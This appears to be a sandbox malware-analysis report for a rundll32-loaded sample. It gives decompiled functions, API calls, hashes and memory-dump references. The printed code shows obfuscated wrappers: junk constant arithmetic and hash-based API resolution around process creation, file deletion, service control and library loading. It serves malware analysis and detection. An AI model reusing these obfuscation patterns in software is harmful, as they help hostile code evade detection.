API String ID: 823142352-0
Opcode ID: d4659c096c709fa19e878a53af5a36d243dcc7bf27e5cf64b735575a0ea006bd
Instruction ID: 87d0e426a01138659d3210b311bb3cf9d6c63906aa8c61da5ef899ae6f506e5a
Opcode Fuzzy Hash: d4659c096c709fa19e878a53af5a36d243dcc7bf27e5cf64b735575a0ea006bd
Instruction Fuzzy Hash: 57310672901208FBDF05DF95CD098DEBFB6FF88304F108199F914A6250D7B69A60DB90

Uniqueness

Uniqueness Score: -1.00%

Function 00218165, Relevance: 1.6, APIs: 1, Instructions: 78
processCOMMON

Download Yara Rule

C-Code - Quality: 24%

			E00218165(WCHAR* __ecx, WCHAR* __edx, intOrPtr _a4, struct _STARTUPINFOW* _a8, int _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a36, struct _PROCESS_INFORMATION* _a44, intOrPtr _a48, intOrPtr _a56) {
				signed int _v8;
				signed int _v12;
				unsigned int _v16;
				signed int _v20;
				void* _t47;
				int _t58;
				signed int _t61;
				void* _t65;
				WCHAR* _t66;
				WCHAR* _t67;

				_push(_a56);
				_t67 = __edx;
				_push(0);
				_push(_a48);
				_t66 = __ecx;
				_push(_a44);
				_push(0);
				_push(_a36);
				_push(0);
				_push(_a28);
				_push(_a24);
				_push(_a20);
				_push(0);
				_push(0);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0020E171(_t47);
				_v16 = 0xa2fc;
				_v16 = _v16 >> 5;
				_v16 = _v16 + 0xffff1f57;
				_v16 = _v16 ^ 0xffff035a;
				_v12 = 0x8842;
				_t61 = 0xc;
				_v12 = _v12 * 0xd;
				_push(0xd8c5ba15);
				_v12 = _v12 / _t61;
				_v12 = _v12 ^ 0x0000f812;
				_v20 = 0x5415;
				_push(_t61);
				_push(_t61);
				_push(0xb6b01ae5);
				_v20 = _v20 * 0x5b;
				_v20 = _v20 ^ 0x001da8a2;
				_v8 = 0xf8b5;
				_v8 = _v8 >> 0xa;
				_v8 = _v8 ^ 0x80bbebc5;
				_v8 = _v8 ^ 0x80bbcffb;
				_t65 = 0x47;
				E0020606F(_t65);
				_t58 = CreateProcessW(_t66, _t67, 0, 0, _a20, 0, 0, 0, _a8, _a44); // executed
				return _t58;
			}

0x0021816e
0x00218173
0x00218175
0x00218176
0x00218179
0x0021817b
0x0021817e
0x0021817f
0x00218182
0x00218183
0x00218186
0x00218189
0x0021818c
0x0021818d
0x0021818e
0x00218191
0x00218194
0x00218195
0x00218196
0x0021819b
0x002181a4
0x002181a8
0x002181af
0x002181b6
0x002181c3
0x002181c7
0x002181cf
0x002181d4
0x002181d7
0x002181de
0x002181e9
0x002181ea
0x002181eb
0x002181f2
0x002181f5
0x002181fc
0x00218203
0x00218207
0x0021820e
0x00218221
0x00218222
0x0021823a
0x00218242

APIs

CreateProcessW.KERNEL32(0BF52F2F,00000000,00000000,00000000,00000044,00000000,00000000,00000000,FFFF035A,?), ref: 0021823A

Memory Dump Source

Source File: 0000000A.00000002.2099046063.0000000000201000.00000020.00000001.sdmp, Offset: 00200000, based on PE: true

Associated: 0000000A.00000002.2099037310.0000000000200000.00000004.00000001.sdmp Download File
Associated: 0000000A.00000002.2099077185.000000000021F000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_200000_rundll32.jbxd

Yara matches

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: b05528a14ea75ef9fb60441011f302ef31ff4d999b6e7fcdadd2a509598f610b
Instruction ID: fbc88105ba3c730e60a62e58b3861dd1cbc775ae3bcdfb6dfc0a611bcf705ae8
Opcode Fuzzy Hash: b05528a14ea75ef9fb60441011f302ef31ff4d999b6e7fcdadd2a509598f610b
Instruction Fuzzy Hash: 7A21E3B290020DBFEF058E94CC86CEEBFB9FB44358F008198F91466260D3759A619B50

Uniqueness

Uniqueness Score: -1.00%

Function 002094A3, Relevance: 1.6, APIs: 1, Instructions: 60
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E002094A3(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _t40;
				intOrPtr* _t50;
				void* _t51;
				signed int _t53;
				void* _t58;
				void* _t59;

				_t59 = __edx;
				_t58 = __ecx;
				E0020E171(_t40);
				_v20 = 0xa96c;
				_v20 = _v20 ^ 0xdb4b0424;
				_v20 = _v20 ^ 0xdb4b8f37;
				_v8 = 0xec5f;
				_t53 = 0x33;
				_v8 = _v8 * 0x67;
				_v8 = _v8 >> 0xd;
				_v8 = _v8 | 0x13f5ff17;
				_v8 = _v8 ^ 0x13f5eace;
				_v16 = 0x37e2;
				_v16 = _v16 * 0x6f;
				_v16 = _v16 ^ 0x001836ab;
				_v12 = 0x82bd;
				_v12 = _v12 >> 4;
				_t32 = _t53 + 0x5f; // 0x92
				_v12 = _v12 / _t53;
				_v12 = _v12 ^ 0x00002d3b;
				_t50 = E0020606F(_t32, 0xb6b01ae5, _t53, _t53, 0x2e5d2a1c);
				_t51 =  *_t50(_t58, 0, _t59, 0x28, __ecx, __edx, _a4, 0, 0x28, _a16, _a20, _a24); // executed
				return _t51;
			}

0x002094ae
0x002094b0
0x002094c1
0x002094c6
0x002094cf
0x002094d6
0x002094dd
0x002094ea
0x002094ee
0x002094f1
0x002094f5
0x002094fc
0x00209503
0x0020951a
0x0020951d
0x00209524
0x0020952b
0x00209534
0x00209537
0x0020953a
0x0020954d
0x0020955b
0x00209562

APIs

SetFileInformationByHandle.KERNELBASE(6EE5A95E,00000000,?,00000028,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 0020955B

Memory Dump Source

Source File: 0000000A.00000002.2099046063.0000000000201000.00000020.00000001.sdmp, Offset: 00200000, based on PE: true

Associated: 0000000A.00000002.2099037310.0000000000200000.00000004.00000001.sdmp Download File
Associated: 0000000A.00000002.2099077185.000000000021F000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_200000_rundll32.jbxd

Yara matches

Similarity

API ID: FileHandleInformation
String ID:
API String ID: 3935143524-0
Opcode ID: baafaaa223f7f5a2fc0b958a68d71a7890cb0828c43d606bc6318d468937fe4b
Instruction ID: 28d2e394c66bc60ac86c0d1b5f1191e7c528d660d7b3d7a198f25d952915d6f6
Opcode Fuzzy Hash: baafaaa223f7f5a2fc0b958a68d71a7890cb0828c43d606bc6318d468937fe4b
Instruction Fuzzy Hash: AC215675E01208FBEB18DFA5C94AADEBFB5EB40304F108499F814AB292D3B45B15DF90

Uniqueness

Uniqueness Score: -1.00%

Function 00208289, Relevance: 1.6, APIs: 1, Instructions: 52
fileCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E00208289(void* __ecx, void* __edx, WCHAR* _a4) {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				signed int _v20;
				void* _v32;
				intOrPtr _v36;
				void* _t39;
				int _t49;
				signed int _t51;

				_push(_a4);
				E0020E171(_t39);
				_v36 = 0x41b5b5;
				asm("stosd");
				_t51 = 0x3d;
				asm("stosd");
				asm("stosd");
				_v12 = 0x9aa2;
				_v12 = _v12 + 0x23f6;
				_v12 = _v12 >> 0xc;
				_v12 = _v12 ^ 0x00001b6c;
				_v20 = 0x293c;
				_v20 = _v20 + 0xffff17af;
				_v20 = _v20 ^ 0xffff269b;
				_v16 = 0x3622;
				_v16 = _v16 | 0x78a52f71;
				_v16 = _v16 ^ 0x78a543e8;
				_v8 = 0x2f22;
				_v8 = _v8 + 0x35c7;
				_v8 = _v8 >> 2;
				_v8 = _v8 / _t51;
				_v8 = _v8 ^ 0x0000117e;
				E0020606F(0x314, 0xb6b01ae5, _t51, _t51, 0x1b106d81);
				_t49 = DeleteFileW(_a4); // executed
				return _t49;
			}

0x00208290
0x00208295
0x0020829a
0x002082a8
0x002082ab
0x002082af
0x002082b5
0x002082b6
0x002082bd
0x002082c4
0x002082c8
0x002082cf
0x002082d6
0x002082dd
0x002082e4
0x002082eb
0x002082f2
0x002082f9
0x00208300
0x00208307
0x00208311
0x00208319
0x00208332
0x0020833d
0x00208343

APIs

DeleteFileW.KERNELBASE(00001B6C,?,?,?,?,?,?,00000000), ref: 0020833D

Memory Dump Source

Source File: 0000000A.00000002.2099046063.0000000000201000.00000020.00000001.sdmp, Offset: 00200000, based on PE: true

Associated: 0000000A.00000002.2099037310.0000000000200000.00000004.00000001.sdmp Download File
Associated: 0000000A.00000002.2099077185.000000000021F000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_200000_rundll32.jbxd

Yara matches

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 068c8ad58f972a258c528a11afa709a8a7f7370e1a23e16540f0ab729b5d3cce
Instruction ID: 7ed92cb9daa3e6c880aba55c62874c261a39d4ccbcb185bac80593a9ad9cca7c
Opcode Fuzzy Hash: 068c8ad58f972a258c528a11afa709a8a7f7370e1a23e16540f0ab729b5d3cce
Instruction Fuzzy Hash: 57115B75E0120CFBEB08DFE9C84A4DEFBB5FB54304F108188E410A62A5D3B84B598F50

Uniqueness

Uniqueness Score: -1.00%

Function 00203296, Relevance: 1.6, APIs: 1, Instructions: 50
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E00203296(struct _SHFILEOPSTRUCTW* __ecx, void* __edx, intOrPtr _a4) {
				signed int _v8;
				unsigned int _v12;
				unsigned int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				void* _t40;
				int _t49;
				signed int _t51;
				struct _SHFILEOPSTRUCTW* _t56;

				_push(_a4);
				_t56 = __ecx;
				_push(__ecx);
				E0020E171(_t40);
				_v28 = _v28 & 0x00000000;
				_v24 = _v24 & 0x00000000;
				_v36 = 0x1409b1;
				_v32 = 0x71de97;
				_v20 = 0x10af;
				_v20 = _v20 << 3;
				_v20 = _v20 ^ 0x000096e0;
				_v12 = 0xfce5;
				_v12 = _v12 ^ 0x58bbe0cf;
				_v12 = _v12 >> 5;
				_v12 = _v12 ^ 0x02c5a2c7;
				_v16 = 0xf79b;
				_v16 = _v16 >> 2;
				_v16 = _v16 ^ 0x00000fb9;
				_v8 = 0xa9b8;
				_v8 = _v8 ^ 0x8b980f22;
				_t51 = 0xc;
				_v8 = _v8 / _t51;
				_v8 = _v8 ^ 0x0ba20c7c;
				E0020606F(0x21a, 0xf44a99f2, _t51, _t51, 0x438313f0);
				_t49 = SHFileOperationW(_t56); // executed
				return _t49;
			}

0x0020329d
0x002032a0
0x002032a3
0x002032a4
0x002032a9
0x002032af
0x002032b3
0x002032ba
0x002032c1
0x002032c8
0x002032cc
0x002032d3
0x002032da
0x002032e1
0x002032e5
0x002032ec
0x002032f3
0x002032f7
0x002032fe
0x00203305
0x00203311
0x0020331c
0x0020331f
0x0020333e
0x00203347
0x0020334d

APIs

SHFileOperationW.SHELL32 ref: 00203347

Memory Dump Source

Source File: 0000000A.00000002.2099046063.0000000000201000.00000020.00000001.sdmp, Offset: 00200000, based on PE: true

Associated: 0000000A.00000002.2099037310.0000000000200000.00000004.00000001.sdmp Download File
Associated: 0000000A.00000002.2099077185.000000000021F000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_200000_rundll32.jbxd

Yara matches

Similarity

API ID: FileOperation
String ID:
API String ID: 3080627654-0
Opcode ID: 4e58339be104edb10afeac2e85769c6a1b22744e76ddd0819eceb4ac5dedda93
Instruction ID: 5a6e5b1da9aef1f5f3d68b2143758b33a4f3abeea1e37d96146d13d9e825ec9d
Opcode Fuzzy Hash: 4e58339be104edb10afeac2e85769c6a1b22744e76ddd0819eceb4ac5dedda93
Instruction Fuzzy Hash: F5114671D00219EBEB04DFE4C94AAEEBBB4EB44308F108198E414A7291C3B80B488F91

Uniqueness

Uniqueness Score: -1.00%

Function 00219EEB, Relevance: 1.5, APIs: 1, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E00219EEB(void* __ecx, void* __edx, int _a4, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				short* _v24;
				short* _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				void* _t33;
				void* _t41;

				_push(_a16);
				_push(_a12);
				_push(0);
				_push(_a4);
				_push(0);
				E0020E171(_t33);
				_v36 = 0x1a5225;
				_v32 = 0x6186e9;
				_v28 = 0;
				_v24 = 0;
				_v20 = 0x159f;
				_v20 = _v20 ^ 0xd8eb5afd;
				_v20 = _v20 ^ 0xd8eb17ca;
				_v16 = 0xd686;
				_v16 = _v16 * 0x29;
				_v16 = _v16 ^ 0x00226c98;
				_v12 = 0xd637;
				_v12 = _v12 | 0x41a2b1c9;
				_v12 = _v12 ^ 0x41a2fe45;
				_v8 = 0x7ffa;
				_v8 = _v8 | 0xd8d6b90f;
				_v8 = _v8 ^ 0xd8d6edd8;
				E0020606F(0x1ec, 0xbee648b, __ecx, __ecx, 0x6c130eb5);
				_t41 = OpenSCManagerW(0, 0, _a4); // executed
				return _t41;
			}

0x00219ef2
0x00219ef7
0x00219efa
0x00219efb
0x00219eff
0x00219f00
0x00219f05
0x00219f0f
0x00219f1b
0x00219f1e
0x00219f21
0x00219f28
0x00219f2f
0x00219f36
0x00219f4d
0x00219f50
0x00219f57
0x00219f5e
0x00219f65
0x00219f6c
0x00219f73
0x00219f7a
0x00219f8d
0x00219f9a
0x00219fa0

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,41A2FE45,?,?,?,?,?,?,?,?,00215A72,0000B2BF), ref: 00219F9A

Memory Dump Source

Source File: 0000000A.00000002.2099046063.0000000000201000.00000020.00000001.sdmp, Offset: 00200000, based on PE: true

Associated: 0000000A.00000002.2099037310.0000000000200000.00000004.00000001.sdmp Download File
Associated: 0000000A.00000002.2099077185.000000000021F000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_200000_rundll32.jbxd

Yara matches

Similarity

API ID: ManagerOpen
String ID:
API String ID: 1889721586-0
Opcode ID: 53ec5c0606a994eb95c08fd96e75b2b2180dfb57eb41605714a3daa805ae5c75
Instruction ID: 5341e0973f7be0b4a947d28acc27020b662a93fcd90b22c436ee79455afb5508
Opcode Fuzzy Hash: 53ec5c0606a994eb95c08fd96e75b2b2180dfb57eb41605714a3daa805ae5c75
Instruction Fuzzy Hash: 1111F0B5D0122DABDB04DFE9C84A9EEBFB4EF05344F108189E815A6250D3B45B608FA1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: rundll32.exe PID: 2460 Parent PID: 2824 rundll32.exeCOMMON

Execution Graph

Execution Coverage:	18%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	961
Total number of Limit Nodes:	15

Executed Functions

Function 00727FC8, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 56
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 75%

			E00727FC8(void* __ecx, long __edx, intOrPtr _a4, long _a8, intOrPtr _a12, void* _a16) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _t43;
				void* _t54;
				signed int _t56;
				signed int _t57;
				long _t64;

				_push(_a16);
				_t64 = __edx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				E0071E171(_t43);
				_v12 = 0x3d4b;
				_v12 = _v12 + 0xba0c;
				_v12 = _v12 ^ 0x32f19bab;
				_v12 = _v12 ^ 0x32f14d3d;
				_v20 = 0x6588;
				_t56 = 0x46;
				_v20 = _v20 / _t56;
				_v20 = _v20 ^ 0x00006149;
				_v8 = 0xc11f;
				_t57 = 0x1c;
				_v8 = _v8 / _t57;
				_v8 = _v8 >> 8;
				_v8 = _v8 ^ 0x00002da7;
				_v16 = 0xd6d7;
				_v16 = _v16 ^ 0xb4edc2cf;
				_v16 = _v16 ^ 0xb4ed5042;
				E0071606F(0xac, 0xb6b01ae5, _t57, _t57, 0xfa5912f8);
				_t54 = RtlAllocateHeap(_a16, _t64, _a8); // executed
				return _t54;
			}

0x00727fcf
0x00727fd2
0x00727fd4
0x00727fd7
0x00727fda
0x00727fdd
0x00727fdf
0x00727fe4
0x00727fed
0x00727ff4
0x00727ffb
0x00728002
0x0072800e
0x00728013
0x00728018
0x0072801f
0x00728029
0x00728034
0x00728037
0x0072803b
0x00728042
0x00728049
0x00728050
0x0072806f
0x0072807e
0x00728084

APIs

RtlAllocateHeap.NTDLL(?,026DAAD3,B4ED5042,?,?,?,?,?,?,?,?,?,?), ref: 0072807E

Strings

Ia, xrefs: 00728018
K=, xrefs: 00727FE4

Memory Dump Source

Source File: 0000000C.00000002.2102416514.0000000000711000.00000020.00000001.sdmp, Offset: 00710000, based on PE: true

Associated: 0000000C.00000002.2102412245.0000000000710000.00000004.00000001.sdmp Download File
Associated: 0000000C.00000002.2102433761.000000000072F000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_710000_rundll32.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID: Ia$K=
API String ID: 1279760036-1694132640
Opcode ID: b789e11f9eea775a78287693f7352f71c317194be4ff8f8270c2d0e745cba24f
Instruction ID: 9af688bd21bc6e67d1941fad4f868a12a61098aebe2ce1e1e752c1b8209d095e
Opcode Fuzzy Hash: b789e11f9eea775a78287693f7352f71c317194be4ff8f8270c2d0e745cba24f
Instruction Fuzzy Hash: 14115971E00218FBEF04DFE5C90A8DEBFB2EB45310F108189EA1466250C3BA9A219B91

Uniqueness

Uniqueness Score: -1.00%

Function 007229A0, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SHGetFolderPathW.SHELL32(00000000,00000000,00000000,00000000,?), ref: 00722A76

Strings

-:, xrefs: 007229C4

Memory Dump Source

Source File: 0000000C.00000002.2102416514.0000000000711000.00000020.00000001.sdmp, Offset: 00710000, based on PE: true

Associated: 0000000C.00000002.2102412245.0000000000710000.00000004.00000001.sdmp Download File
Associated: 0000000C.00000002.2102433761.000000000072F000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_710000_rundll32.jbxd

Yara matches

Similarity

API ID: FolderPath
String ID: -:
API String ID: 1514166925-3625610842
Opcode ID: f512e2cfcb210f02178d04eca577d79f121b754574598481bdb18aec6494e751
Instruction ID: 98668595651fac23c67f49447be99db186bf83d019df2c00889299724f071b09
Opcode Fuzzy Hash: f512e2cfcb210f02178d04eca577d79f121b754574598481bdb18aec6494e751
Instruction Fuzzy Hash: 562122B2D01219BBDF15DFD5C84A8DEBBB5FF04758F108088E92866250D3B94A54DF90

Uniqueness

Uniqueness Score: -1.00%

Function 007130A4, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 53
serviceCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 80%

			E007130A4(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _t40;
				int _t51;
				signed int _t53;
				signed int _t54;
				void* _t61;

				_push(_a12);
				_t61 = __ecx;
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E0071E171(_t40);
				_v20 = 0x20f1;
				_v20 = _v20 | 0xe56d7bd2;
				_v20 = _v20 ^ 0xe56d3b5f;
				_v16 = 0x60a3;
				_v16 = _v16 | 0xd94b0631;
				_v16 = _v16 ^ 0xd94b4fc4;
				_v8 = 0x959e;
				_t53 = 0x46;
				_v8 = _v8 / _t53;
				_v8 = _v8 + 0xffff8b5f;
				_t54 = 0x4f;
				_v8 = _v8 / _t54;
				_v8 = _v8 ^ 0x033dd111;
				_v12 = 0xe903;
				_v12 = _v12 + 0xffff1267;
				_v12 = _v12 ^ 0xffffff7c;
				E0071606F(0x14b, 0xbee648b, _t54, _t54, 0x43269794);
				_t51 = CloseServiceHandle(_t61); // executed
				return _t51;
			}

0x007130ab
0x007130ae
0x007130b0
0x007130b3
0x007130b7
0x007130b8
0x007130bd
0x007130c6
0x007130cd
0x007130d4
0x007130db
0x007130e2
0x007130e9
0x007130f5
0x007130fa
0x007130ff
0x00713109
0x00713114
0x00713117
0x0071311e
0x00713125
0x0071312c
0x0071314b
0x00713154
0x0071315a

APIs

CloseServiceHandle.ADVAPI32(?,?,?,?,?,?,?,?,?), ref: 00713154

Strings

_;m, xrefs: 0071313C

Memory Dump Source

Source File: 0000000C.00000002.2102416514.0000000000711000.00000020.00000001.sdmp, Offset: 00710000, based on PE: true

Associated: 0000000C.00000002.2102412245.0000000000710000.00000004.00000001.sdmp Download File
Associated: 0000000C.00000002.2102433761.000000000072F000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_710000_rundll32.jbxd

Yara matches

Similarity

API ID: CloseHandleService
String ID: _;m
API String ID: 1725840886-664033043
Opcode ID: 645477ed48e2118058f0cbc5a8afeb89a96a5cc23f06e2a0e3471286d8c9f7a7
Instruction ID: 6b2e273e171cab3dffa376ffce35575f8fca4cfaced9c791f8ff387a0f13cb08
Opcode Fuzzy Hash: 645477ed48e2118058f0cbc5a8afeb89a96a5cc23f06e2a0e3471286d8c9f7a7
Instruction Fuzzy Hash: AD113076E00218FFEB04DFE8CC468DEBB71EB44310F108599E5146B292D7B95B519B51

Uniqueness

Uniqueness Score: -1.00%

Function 0071E172, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 46
serviceCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 75%

			E0071E172(void* __ecx, void* __edx, void* _a4, int _a8, short* _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				void* _t41;
				void* _t48;

				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E0071E171(_t41);
				_v24 = _v24 & 0x00000000;
				_v28 = 0x2ee32c;
				_v20 = 0x466;
				_v20 = _v20 + 0xbcb9;
				_v20 = _v20 ^ 0x000097c2;
				_v8 = 0x1d17;
				_v8 = _v8 + 0xe3a6;
				_v8 = _v8 | 0x1371b482;
				_v8 = _v8 + 0xcae3;
				_v8 = _v8 ^ 0x13721426;
				_v16 = 0xc1c8;
				_v16 = _v16 + 0xffff2ba9;
				_v16 = _v16 ^ 0xffffbe8b;
				_v12 = 0x3352;
				_v12 = _v12 << 9;
				_v12 = _v12 | 0x4940d942;
				_v12 = _v12 ^ 0x4966c2a7;
				E0071606F(0x24f, 0xbee648b, __ecx, __ecx, 0x334b429d);
				_t48 = OpenServiceW(_a4, _a12, _a8); // executed
				return _t48;
			}

0x0071e178
0x0071e17b
0x0071e17e
0x0071e181
0x0071e185
0x0071e186
0x0071e18b
0x0071e192
0x0071e19e
0x0071e1a5
0x0071e1ac
0x0071e1b3
0x0071e1ba
0x0071e1c1
0x0071e1c8
0x0071e1cf
0x0071e1d6
0x0071e1dd
0x0071e1e4
0x0071e1eb
0x0071e1f2
0x0071e1f6
0x0071e1fd
0x0071e21c
0x0071e22d
0x0071e232

APIs

OpenServiceW.ADVAPI32(4966C2A7,000097C2,FFFFBE8B,?,?,?,?,?,?,?,?,?,?), ref: 0071E22D

Strings

,., xrefs: 0071E192

Memory Dump Source

Source File: 0000000C.00000002.2102416514.0000000000711000.00000020.00000001.sdmp, Offset: 00710000, based on PE: true

Associated: 0000000C.00000002.2102412245.0000000000710000.00000004.00000001.sdmp Download File
Associated: 0000000C.00000002.2102433761.000000000072F000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_710000_rundll32.jbxd

Yara matches

Similarity

API ID: OpenService
String ID: ,.
API String ID: 3098006287-263192673
Opcode ID: 47688d64d3b0e0483b819327fb3ad2d4dd2b99bd4eab320a8e24d3c64762cb4c
Instruction ID: d67bb7c0a73d738a052836954d514f5a861916030717a751bf3f5b478f69f35d
Opcode Fuzzy Hash: 47688d64d3b0e0483b819327fb3ad2d4dd2b99bd4eab320a8e24d3c64762cb4c
Instruction Fuzzy Hash: 1E1107B6D0020DFFEF01DFD4C94A8AEBB71FB14304F508198E91566261D3B58B54AF91

Uniqueness

Uniqueness Score: -1.00%

Function 00727998, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 46
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 28%

			E00727998(void* __ecx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12) {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				unsigned int _v20;
				signed int _v24;
				intOrPtr _v28;
				void* __edx;
				void* _t42;
				struct HINSTANCE__* _t49;
				void* _t52;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				E0071E171(_t42);
				_v24 = _v24 & 0x00000000;
				_v28 = 0x25d38;
				_v20 = 0x510f;
				_v20 = _v20 >> 8;
				_v20 = _v20 ^ 0x00005672;
				_v16 = 0xf8b1;
				_v16 = _v16 + 0xffff15e9;
				_v16 = _v16 + 0xffffcd36;
				_v16 = _v16 ^ 0xffff83d2;
				_v12 = 0x4d1a;
				_v12 = _v12 << 0xc;
				_v12 = _v12 >> 0xe;
				_v12 = _v12 >> 7;
				_v12 = _v12 ^ 0x000018af;
				_v8 = 0x7f5d;
				_v8 = _v8 ^ 0x2c3d59fe;
				_v8 = _v8 + 0x58d2;
				_v8 = _v8 << 0xe;
				_v8 = _v8 ^ 0x5fdd21ae;
				_push(0x811bfff3);
				_push(0xb6b01ae5);
				_t52 = 0x55;
				E0071606F(_t52);
				_t49 = LoadLibraryW(_a12); // executed
				return _t49;
			}

0x0072799e
0x007279a1
0x007279a4
0x007279a9
0x007279ae
0x007279b5
0x007279bc
0x007279c3
0x007279c7
0x007279ce
0x007279d5
0x007279dc
0x007279e3
0x007279ea
0x007279f1
0x007279f5
0x007279f9
0x007279fd
0x00727a04
0x00727a0b
0x00727a12
0x00727a19
0x00727a1d
0x00727a30
0x00727a37
0x00727a3e
0x00727a3f
0x00727a4a
0x00727a4f

APIs

LoadLibraryW.KERNEL32(00005672,?,?,?,?,?,?,?,?,38246A1A), ref: 00727A4A

Strings

rV, xrefs: 007279C7

Memory Dump Source

Source File: 0000000C.00000002.2102416514.0000000000711000.00000020.00000001.sdmp, Offset: 00710000, based on PE: true

Associated: 0000000C.00000002.2102412245.0000000000710000.00000004.00000001.sdmp Download File
Associated: 0000000C.00000002.2102433761.000000000072F000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_710000_rundll32.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID: rV
API String ID: 1029625771-3738762570
Opcode ID: 6c2337c38b901229c7e322e5f1d9b1029b3c9dada85b33bca72088930e709091
Instruction ID: ce3b52362d1919cc5586f5e28568abf90f5f561f19364002f8b029080912af25
Opcode Fuzzy Hash: 6c2337c38b901229c7e322e5f1d9b1029b3c9dada85b33bca72088930e709091
Instruction Fuzzy Hash: F01107B6D1160DFBDB14DFE4CC4A4DEBBB4FB00309F608588E92566290D3B44B549F50

Uniqueness

Uniqueness Score: -1.00%

Function 0072C7C3, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 41
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 23%

			E0072C7C3() {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				unsigned int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				void* _t44;

				_v24 = _v24 & 0x00000000;
				_v36 = 0x43a94f;
				_v32 = 0x1049b9;
				_v28 = 0x3eaad4;
				_v20 = 0xf167;
				_v20 = _v20 >> 0xf;
				_v20 = _v20 ^ 0x00002afd;
				_v12 = 0xf1a2;
				_v12 = _v12 + 0xb8a5;
				_v12 = _v12 | 0x0ef61b66;
				_v12 = _v12 ^ 0xe07f37e9;
				_v12 = _v12 ^ 0xee88d275;
				_v8 = 0xe943;
				_v8 = _v8 + 0xe3dd;
				_v8 = _v8 | 0x8abcb7de;
				_v8 = _v8 + 0xffff75bb;
				_v8 = _v8 ^ 0x8abd009e;
				_v16 = 0x92be;
				_v16 = _v16 + 0xa80e;
				_v16 = _v16 ^ 0x00014c59;
				_push(0xec5aa560);
				_push(_t43);
				_push(0xb6b01ae5);
				_t44 = 0x2d;
				E0071606F(_t44);
				ExitProcess(0);
			}

0x0072c7c9
0x0072c7cd
0x0072c7d4
0x0072c7db
0x0072c7e2
0x0072c7e9
0x0072c7ed
0x0072c7f4
0x0072c7fb
0x0072c802
0x0072c809
0x0072c810
0x0072c817
0x0072c81e
0x0072c825
0x0072c82c
0x0072c833
0x0072c83b
0x0072c842
0x0072c849
0x0072c85c
0x0072c862
0x0072c863
0x0072c86a
0x0072c86b
0x0072c875

APIs

ExitProcess.KERNELBASE(00000000), ref: 0072C875

Strings

C, xrefs: 0072C817

Memory Dump Source

Source File: 0000000C.00000002.2102416514.0000000000711000.00000020.00000001.sdmp, Offset: 00710000, based on PE: true

Associated: 0000000C.00000002.2102412245.0000000000710000.00000004.00000001.sdmp Download File
Associated: 0000000C.00000002.2102433761.000000000072F000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_710000_rundll32.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID: C
API String ID: 621844428-3705061908
